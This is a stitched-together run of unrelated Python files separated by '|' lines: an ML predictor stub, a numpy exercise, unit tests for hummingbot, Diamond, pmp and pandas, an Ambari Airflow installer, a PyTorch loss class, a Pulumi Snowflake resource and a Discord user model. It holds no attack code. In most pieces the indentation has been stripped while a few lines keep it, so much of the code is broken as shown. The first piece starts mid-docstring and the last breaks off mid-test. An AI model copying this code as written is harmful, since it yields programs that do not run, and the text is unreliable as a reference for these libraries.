Can be used to extend to your own local ML implementation or another API.
"""
def get_prediction(self, image):
raise NotImplementedError()
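# Illustrative extension (a sketch, not part of the original API): a concrete
# predictor only needs to implement get_prediction(image).
class EchoPredictor(ImagePredictor):
    """ Example predictor that always returns a fixed, empty prediction. """
    def get_prediction(self, image):
        # A real implementation would run a local model or call an external API here.
        return {"label": "unknown", "confidence": 0.0}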
|
import numpy as np
n,m = map(int,input().strip().split())
arr = np.ndarray(shape=(n,m),dtype=np.int32)
for i in range(n):
row = list(map(int,input().strip().split()))
arr[i,:] = row
trans = np.transpose(arr)
flat = arr.flatten()
print(trans)
print(flat)
|
import math
import unittest
from hummingbot.client.performance_analysis import PerformanceAnalysis
class TestPerformanceAnalysis(unittest.TestCase):
def test_basic_one_ex(self):
""" Test performance analysis on a one exchange balance. """
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0.5, True, True)
performance_analysis.add_balances("DAI", 60, False, True)
performance_analysis.add_balances("WETH", 0.4, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
expected_percent = (((0.4 * 50) + 70)/((0.5 * 50) + 60) - 1) * 100
self.assertEqual(calculated_percent, expected_percent, "Basic one ex test failed.")
def test_basic_two_ex(self):
""" Test performance analysis on a two exchange balance with the same currencies trading in both exchanges. """
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0.5, True, True)
performance_analysis.add_balances("DAI", 60, False, True)
performance_analysis.add_balances("WETH", 0.7, True, True)
performance_analysis.add_balances("DAI", 50, False, True)
performance_analysis.add_balances("WETH", 0.4, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
performance_analysis.add_balances("WETH", 0.3, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
expected_percent = (((0.7 * 50) + 140)/((1.2 * 50) + 110) - 1) * 100
        self.assertEqual(calculated_percent, expected_percent, "Basic two ex test failed.")
def test_different_tokens_two_ex(self):
""" Test performance analysis on a two exchange balance with different currencies trading. Note that this test
will not work as the config file that contains the conversion has not been loaded."""
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0.5, True, True)
performance_analysis.add_balances("DAI", 60, False, True)
performance_analysis.add_balances("ETH", 0.7, True, True)
performance_analysis.add_balances("USD", 50, False, True)
performance_analysis.add_balances("WETH", 0.4, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
performance_analysis.add_balances("ETH", 0.3, True, False)
performance_analysis.add_balances("USD", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
expected_percent = (((0.7 * 50) + 140)/((1.2 * 50) + 110) - 1) * 100
        self.assertAlmostEqual(calculated_percent, expected_percent, msg="Two diff token test failed.", delta=0.1)
def test_nan_starting(self):
""" Test the case where the starting balance is 0. """
performance_analysis = PerformanceAnalysis()
performance_analysis.add_balances("WETH", 0, True, True)
performance_analysis.add_balances("DAI", 0, False, True)
performance_analysis.add_balances("WETH", 0.3, True, False)
performance_analysis.add_balances("DAI", 70, False, False)
calculated_percent = performance_analysis.compute_profitability(50)
self.assertTrue(math.isnan(calculated_percent), "Starting value of 0 test failed.")
if __name__ == "__main__":
unittest.main()
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from test import patch
from test import Mock
from diamond.collector import Collector
from nvidia_gpu import NvidiaGPUCollector
##########################################################################
class TestNvidiaGPUCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('NvidiaGPUCollector', {
})
self.collector = NvidiaGPUCollector(config, None)
def test_import(self):
self.assertTrue(NvidiaGPUCollector)
@patch.object(Collector, 'publish')
def test_should_publish_gpu_stat(self, publish_mock):
output_mock = Mock(
return_value=(self.getFixture('nvidia_smi').getvalue(), '')
)
collector_mock = patch.object(
NvidiaGPUCollector,
'run_command',
output_mock
)
collector_mock.start()
self.collector.collect()
collector_mock.stop()
metrics = {
'gpu_0.memory.total': 4095,
'gpu_0.memory.used': 2670,
'gpu_0.memory.free': 1425,
'gpu_0.utilization.gpu': 0,
'gpu_0.utilization.memory': 0,
'gpu_0.temperature.gpu': 53,
'gpu_1.memory.total': 4095,
'gpu_1.memory.used': 2670,
'gpu_1.memory.free': 1425,
'gpu_1.utilization.gpu': 0,
'gpu_1.utilization.memory': 0,
'gpu_1.temperature.gpu': 44,
'gpu_2.memory.total': 4095,
'gpu_2.memory.used': 1437,
'gpu_2.memory.free': 2658,
'gpu_2.utilization.gpu': 0,
'gpu_2.utilization.memory': 0,
'gpu_2.temperature.gpu': 48,
'gpu_3.memory.total': 4095,
'gpu_3.memory.used': 1437,
'gpu_3.memory.free': 2658,
'gpu_3.utilization.gpu': 0,
'gpu_3.utilization.memory': 0,
'gpu_3.temperature.gpu': 44
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
##########################################################################
if __name__ == "__main__":
unittest.main()
|
import sys, os, pwd, grp, signal, time
from resource_management import *
from subprocess import call
from airflow_setup import *
class AirflowWorker(Script):
"""
Contains the interface definitions for methods like install,
start, stop, status, etc. for the Airflow Server
"""
def install(self, env):
import params
env.set_params(params)
self.install_packages(env)
Logger.info(format("Installing Airflow Service"))
        # virtualenv setting ------------------------------------------
Execute(format("python3 /datalabnas/hadoop3/get-pip.py"))
Execute(format("pip3 install --upgrade configparser"))
Execute(format("pip3 install virtualenv"))
Execute(format("virtualenv {airflow_home}/airflow_env --python=python3"))
# -------------------------------------------------------------
Execute(format("export SLUGIFY_USES_TEXT_UNIDECODE=yes && {airflow_home}/airflow_env/bin/pip install --upgrade {airflow_pip_params} apache-airflow[all]==1.10.10 --constraint https://raw.githubusercontent.com/apache/airflow/1.10.10/requirements/requirements-python3.6.txt"))
Execute(format("export SLUGIFY_USES_TEXT_UNIDECODE=yes && {airflow_home}/airflow_env/bin/pip install --upgrade {airflow_pip_params} apache-airflow[celery]==1.10.10 --constraint https://raw.githubusercontent.com/apache/airflow/1.10.10/requirements/requirements-python3.6.txt"))
Execute(format("chmod 755 {airflow_home}/airflow_env/bin/airflow"))
Execute(format("useradd {airflow_user}"), ignore_failures=True)
Execute(format("mkdir -p {airflow_home}"))
airflow_make_startup_script(env)
Execute(format("chown -R {airflow_user}:{airflow_group} {airflow_home}"))
Execute(format("export AIRFLOW_HOME={airflow_home} && {airflow_home}/airflow_env/bin/airflow initdb"),
user=params.airflow_user
)
def configure(self, env):
import params
env.set_params(params)
airflow_configure(env)
airflow_make_systemd_scripts_worker(env)
def start(self, env):
import params
self.configure(env)
Execute("service airflow-worker start")
time.sleep(10)
Execute('ps -ef | grep "airflow serve_logs" | grep -v grep | awk \'{print $2}\' > ' + params.airflow_worker_pid_file,
user=params.airflow_user
)
def stop(self, env):
import params
env.set_params(params)
# Kill the process of Airflow
Execute("service airflow-worker stop")
File(params.airflow_worker_pid_file,
action = "delete"
)
def status(self, env):
import status_params
env.set_params(status_params)
#use built-in method to check status using pidfile
check_process_status(status_params.airflow_worker_pid_file)
if __name__ == "__main__":
AirflowWorker().execute()
|
from MDRSREID.Loss_Meter import Loss
import torch.nn as nn
import torch
from MDRSREID.utils.meter import RecentAverageMeter as Meter
class IDLoss(Loss):
def __init__(self, cfg, tb_writer=None):
super(IDLoss, self).__init__(cfg, tb_writer=tb_writer)
self.criterion = nn.CrossEntropyLoss(reduction='none') # 'none' | 'mean' | 'sum'.
self.part_fmt = '#{}'
def __call__(self, item, pred, step=0, **kwargs):
loss_list = [self.criterion(logits, item['label']).mean() for logits in pred['cls_feat_list']]
# New version of pytorch allow stacking 0-dim tensors, but not concatenating.
loss = torch.stack(loss_list).mean() # sum()
# Meter: stores and computes the average of recent values
self.store_calculate_loss(loss)
# May calculate part loss separately
self.may_calculate_part_loss(loss_list)
# May record losses.
self.may_record_loss(loss_list, step)
# Scale by loss weight
loss *= self.cfg.weight
return {'loss': loss}
def store_calculate_loss(self, loss):
"""
:param loss: torch.stack(loss_list).sum()
:return:
Meter: stores and computes the average of recent values.
"""
if self.cfg.name not in self.meter_dict:
# Here use RecentAverageMeter as Meter
self.meter_dict[self.cfg.name] = Meter(name=self.cfg.name)
# Update the meter, store the current whole loss.
self.meter_dict[self.cfg.name].update(loss.item())
def may_calculate_part_loss(self, loss_list):
"""
:param loss_list: each part loss
:return:
Meter: stores and computes the average of recent values.
For each part loss, calculate the loss separately.
"""
if len(loss_list) > 1:
# stores and computes each part average of recent values
for i in range(len(loss_list)):
# if there is not the meter of the part, create a new one.
if self.part_fmt.format(i + 1) not in self.meter_dict:
self.meter_dict[self.part_fmt.format(i + 1)] = Meter(name=self.part_fmt.format(i + 1))
# Update the meter, store the current part loss
self.meter_dict[self.part_fmt.format(i + 1)].update(loss_list[i].item())
def may_record_loss(self, loss_list, step):
"""
:param loss_list:
:param step:
:return:
Use TensorBoard to record the losses.
"""
if self.tb_writer is not None:
self.tb_writer.add_scalars(main_tag=self.cfg.name,
tag_scalar_dict={self.cfg.name: self.meter_dict[self.cfg.name].avg},
global_step=step
)
# Record each part loss
if len(loss_list) > 1:
self.tb_writer.add_scalars(main_tag='Part ID Losses',
tag_scalar_dict={self.part_fmt.format(i + 1): self.meter_dict[self.part_fmt.format(i + 1)].avg
for i in range(len(loss_list))},
global_step=step
)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SchemaArgs', 'Schema']
@pulumi.input_type
class SchemaArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]] = None):
"""
The set of arguments for constructing a Schema resource.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]] tags: Definitions of a tag to associate with the resource.
"""
pulumi.set(__self__, "database", database)
if comment is not None:
pulumi.set(__self__, "comment", comment)
if data_retention_days is not None:
pulumi.set(__self__, "data_retention_days", data_retention_days)
if is_managed is not None:
pulumi.set(__self__, "is_managed", is_managed)
if is_transient is not None:
pulumi.set(__self__, "is_transient", is_transient)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The database in which to create the schema.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a comment for the schema.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="dataRetentionDays")
def data_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
"""
return pulumi.get(self, "data_retention_days")
@data_retention_days.setter
def data_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_retention_days", value)
@property
@pulumi.getter(name="isManaged")
def is_managed(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
"""
return pulumi.get(self, "is_managed")
@is_managed.setter
def is_managed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_managed", value)
@property
@pulumi.getter(name="isTransient")
def is_transient(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
"""
return pulumi.get(self, "is_transient")
@is_transient.setter
def is_transient(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_transient", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the identifier for the schema; must be unique for the database in which the schema is created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _SchemaState:
def __init__(__self__, *,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]] = None):
"""
Input properties used for looking up and filtering Schema resources.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]] tags: Definitions of a tag to associate with the resource.
"""
if comment is not None:
pulumi.set(__self__, "comment", comment)
if data_retention_days is not None:
pulumi.set(__self__, "data_retention_days", data_retention_days)
if database is not None:
pulumi.set(__self__, "database", database)
if is_managed is not None:
pulumi.set(__self__, "is_managed", is_managed)
if is_transient is not None:
pulumi.set(__self__, "is_transient", is_transient)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a comment for the schema.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="dataRetentionDays")
def data_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
"""
return pulumi.get(self, "data_retention_days")
@data_retention_days.setter
def data_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_retention_days", value)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The database in which to create the schema.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter(name="isManaged")
def is_managed(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
"""
return pulumi.get(self, "is_managed")
@is_managed.setter
def is_managed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_managed", value)
@property
@pulumi.getter(name="isTransient")
def is_transient(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
"""
return pulumi.get(self, "is_transient")
@is_transient.setter
def is_transient(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_transient", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the identifier for the schema; must be unique for the database in which the schema is created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SchemaTagArgs']]]]):
pulumi.set(self, "tags", value)
class Schema(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]]] = None,
__props__=None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
schema = snowflake.Schema("schema",
comment="A schema.",
data_retention_days=1,
database="db",
is_managed=False,
is_transient=False)
```
## Import
# format is dbName | schemaName
```sh
$ pulumi import snowflake:index/schema:Schema example 'dbName|schemaName'
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]] tags: Definitions of a tag to associate with the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SchemaArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
schema = snowflake.Schema("schema",
comment="A schema.",
data_retention_days=1,
database="db",
is_managed=False,
is_transient=False)
```
## Import
# format is dbName | schemaName
```sh
$ pulumi import snowflake:index/schema:Schema example 'dbName|schemaName'
```
:param str resource_name: The name of the resource.
:param SchemaArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SchemaArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SchemaArgs.__new__(SchemaArgs)
__props__.__dict__["comment"] = comment
__props__.__dict__["data_retention_days"] = data_retention_days
if database is None and not opts.urn:
raise TypeError("Missing required property 'database'")
__props__.__dict__["database"] = database
__props__.__dict__["is_managed"] = is_managed
__props__.__dict__["is_transient"] = is_transient
__props__.__dict__["name"] = name
__props__.__dict__["tags"] = tags
super(Schema, __self__).__init__(
'snowflake:index/schema:Schema',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
data_retention_days: Optional[pulumi.Input[int]] = None,
database: Optional[pulumi.Input[str]] = None,
is_managed: Optional[pulumi.Input[bool]] = None,
is_transient: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]]] = None) -> 'Schema':
"""
Get an existing Schema resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] comment: Specifies a comment for the schema.
:param pulumi.Input[int] data_retention_days: Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
:param pulumi.Input[str] database: The database in which to create the schema.
:param pulumi.Input[bool] is_managed: Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
:param pulumi.Input[bool] is_transient: Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
:param pulumi.Input[str] name: Specifies the identifier for the schema; must be unique for the database in which the schema is created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SchemaTagArgs']]]] tags: Definitions of a tag to associate with the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SchemaState.__new__(_SchemaState)
__props__.__dict__["comment"] = comment
__props__.__dict__["data_retention_days"] = data_retention_days
__props__.__dict__["database"] = database
__props__.__dict__["is_managed"] = is_managed
__props__.__dict__["is_transient"] = is_transient
__props__.__dict__["name"] = name
__props__.__dict__["tags"] = tags
return Schema(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def comment(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a comment for the schema.
"""
return pulumi.get(self, "comment")
@property
@pulumi.getter(name="dataRetentionDays")
def data_retention_days(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the number of days for which Time Travel actions (CLONE and UNDROP) can be performed on the schema, as well as specifying the default Time Travel retention time for all tables created in the schema.
"""
return pulumi.get(self, "data_retention_days")
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
The database in which to create the schema.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter(name="isManaged")
def is_managed(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies a managed schema. Managed access schemas centralize privilege management with the schema owner.
"""
return pulumi.get(self, "is_managed")
@property
@pulumi.getter(name="isTransient")
def is_transient(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies a schema as transient. Transient schemas do not have a Fail-safe period so they do not incur additional storage costs once they leave Time Travel; however, this means they are also not protected by Fail-safe in the event of a data loss.
"""
return pulumi.get(self, "is_transient")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the identifier for the schema; must be unique for the database in which the schema is created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.SchemaTag']]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
|
# Future
from __future__ import annotations
# Standard Library
import json
import time
from typing import TypedDict
# Packages
import discord
from typing_extensions import NotRequired
__all__ = (
"UserData",
"User",
)
# noinspection PyTypedDict
class UserData(TypedDict):
id: int
username: str
discriminator: str
avatar: str | None
bot: NotRequired[bool]
system: NotRequired[bool]
mfa_enabled: NotRequired[bool]
banner: NotRequired[str | None]
accent_color: NotRequired[int | None]
locale: NotRequired[str]
verified: NotRequired[bool]
email: NotRequired[str | None]
flags: NotRequired[int]
premium_type: NotRequired[int]
public_flags: NotRequired[int]
fetch_time: NotRequired[float]
class User:
def __init__(self, data: UserData) -> None:
self.data: UserData = data
self.id: int = int(data["id"])
self.username: str = data["username"]
self.discriminator: str = data["discriminator"]
self._avatar: str | None = data["avatar"]
self.bot: bool | None = data.get("bot")
self.system: bool | None = data.get("system")
self.mfa_enabled: bool | None = data.get("mfa_enabled")
self._banner: str | None = data.get("banner")
self.accent_color: int | None = data.get("accent_color")
self.locale: str | None = data.get("locale")
self.verified: bool | None = data.get("verified")
self.email: str | None = data.get("email")
self.flags: int | None = data.get("flags")
self.premium_type: int | None = data.get("premium_type")
self.public_flags: int | None = data.get("public_flags")
# Properties
@property
def avatar(self) -> str:
if not (avatar := self._avatar):
return f"https://cdn.discordapp.com/embed/avatars/{self.discriminator % len(discord.DefaultAvatar)}.png"
_format = "gif" if avatar.startswith("a_") else "png"
return f"https://cdn.discordapp.com/avatars/{self.id}/{avatar}.{_format}?size=512"
@property
def banner(self) -> str | None:
if not (banner := self._banner):
return None
_format = "gif" if banner.startswith("a_") else "png"
return f"https://cdn.discordapp.com/banners/{self.id}/{banner}.{_format}?size=512"
# Utilities
@property
def fetch_time(self) -> float:
return self.data.get("fetch_time") or time.time()
@property
def has_expired(self) -> bool:
return (time.time() - self.fetch_time) > 20
@property
def json(self) -> str:
data = self.data.copy()
data["fetch_time"] = self.fetch_time
return json.dumps(data)
|
import pytest
from expects import *
from os import walk
from pmp.experiments import Experiment, ExperimentConfig
from pmp.experiments.election_config import ElectionConfig
from pmp.rules import Bloc
@pytest.fixture
def experiment_config(approval_profile):
config = ExperimentConfig()
config.add_candidates(approval_profile.candidates)
config.add_voters(approval_profile.preferences)
return config
@pytest.fixture
def experiment(experiment_config):
experiment = Experiment(experiment_config)
return experiment
def generated_files(path):
"""Helper returning files generated by an experiment"""
for _, dirs, files in walk(path):
if len(dirs) > 0:
return []
return files
def test_run_experiment_set_election_precedence(experiment, tmpdir):
experiment.set_generated_dir_path(tmpdir)
experiment.set_election(Bloc(), 2)
experiment.set_result_filename('bloc')
experiment.run(n=1, log_on=False, save_win=True, split_dirs=False)
files = generated_files(tmpdir)
expect(len(files)).to(equal(1))
election_id = files[0].split('_')[0]
expect(election_id).to(equal('bloc'))
def test_run_experiment_add_election_precedence(experiment, tmpdir):
experiment.set_generated_dir_path(tmpdir)
experiment.set_election(Bloc(), 2)
experiment.set_result_filename('bloc')
experiment.add_election(Bloc(), 1, 'other')
experiment.run(n=1, log_on=False, save_win=True, split_dirs=False)
files = generated_files(tmpdir)
expect(len(files)).to(equal(1))
election_id = files[0].split('_')[0]
expect(election_id).to(equal('other'))
def test_run_experiment_elect_configs_precedence(experiment, tmpdir):
experiment.set_generated_dir_path(tmpdir)
experiment.set_election(Bloc(), 2)
experiment.set_result_filename('bloc')
experiment.add_election(Bloc(), 1, 'other')
election_configs = [ElectionConfig(Bloc(), 1, 'moreOther')]
experiment.run(n=1, log_on=False, save_win=True, elect_configs=election_configs, split_dirs=False)
files = generated_files(tmpdir)
expect(len(files)).to(equal(1))
election_id = files[0].split('_')[0]
expect(election_id).to(equal('moreOther'))
def test_inout_files(experiment):
expect(experiment._Experiment__generate_inout).to(be_false)
experiment.set_inout_filename('inout_fname')
expect(experiment._Experiment__generate_inout).to(be_true)
|
"""
Behavioral based tests for offsets and date_range.
This file is adapted from https://github.com/pandas-dev/pandas/pull/18761 -
which was more ambitious but less idiomatic in its use of Hypothesis.
You may wish to consult the previous version for inspiration on further
tests, or when trying to pin down the bugs exposed by the tests below.
"""
from hypothesis import (
assume,
given,
settings,
)
import pytest
import pytz
import pandas as pd
from pandas._testing._hypothesis import (
DATETIME_JAN_1_1900_OPTIONAL_TZ,
YQM_OFFSET,
)
# ----------------------------------------------------------------
# Offset-specific behaviour tests
@pytest.mark.arm_slow
@given(DATETIME_JAN_1_1900_OPTIONAL_TZ, YQM_OFFSET)
def test_on_offset_implementations(dt, offset):
assume(not offset.normalize)
# check that the class-specific implementations of is_on_offset match
# the general case definition:
# (dt + offset) - offset == dt
try:
compare = (dt + offset) - offset
except (pytz.NonExistentTimeError, pytz.AmbiguousTimeError):
# When dt + offset does not exist or is DST-ambiguous, assume(False) to
# indicate to hypothesis that this is not a valid test case
# DST-ambiguous example (GH41906):
# dt = datetime.datetime(1900, 1, 1, tzinfo=pytz.timezone('Africa/Kinshasa'))
# offset = MonthBegin(66)
assume(False)
assert offset.is_on_offset(dt) == (compare == dt)
@given(YQM_OFFSET)
@settings(deadline=None) # GH 45118
def test_shift_across_dst(offset):
# GH#18319 check that 1) timezone is correctly normalized and
# 2) that hour is not incorrectly changed by this normalization
assume(not offset.normalize)
# Note that dti includes a transition across DST boundary
dti = pd.date_range(
start="2017-10-30 12:00:00", end="2017-11-06", freq="D", tz="US/Eastern"
)
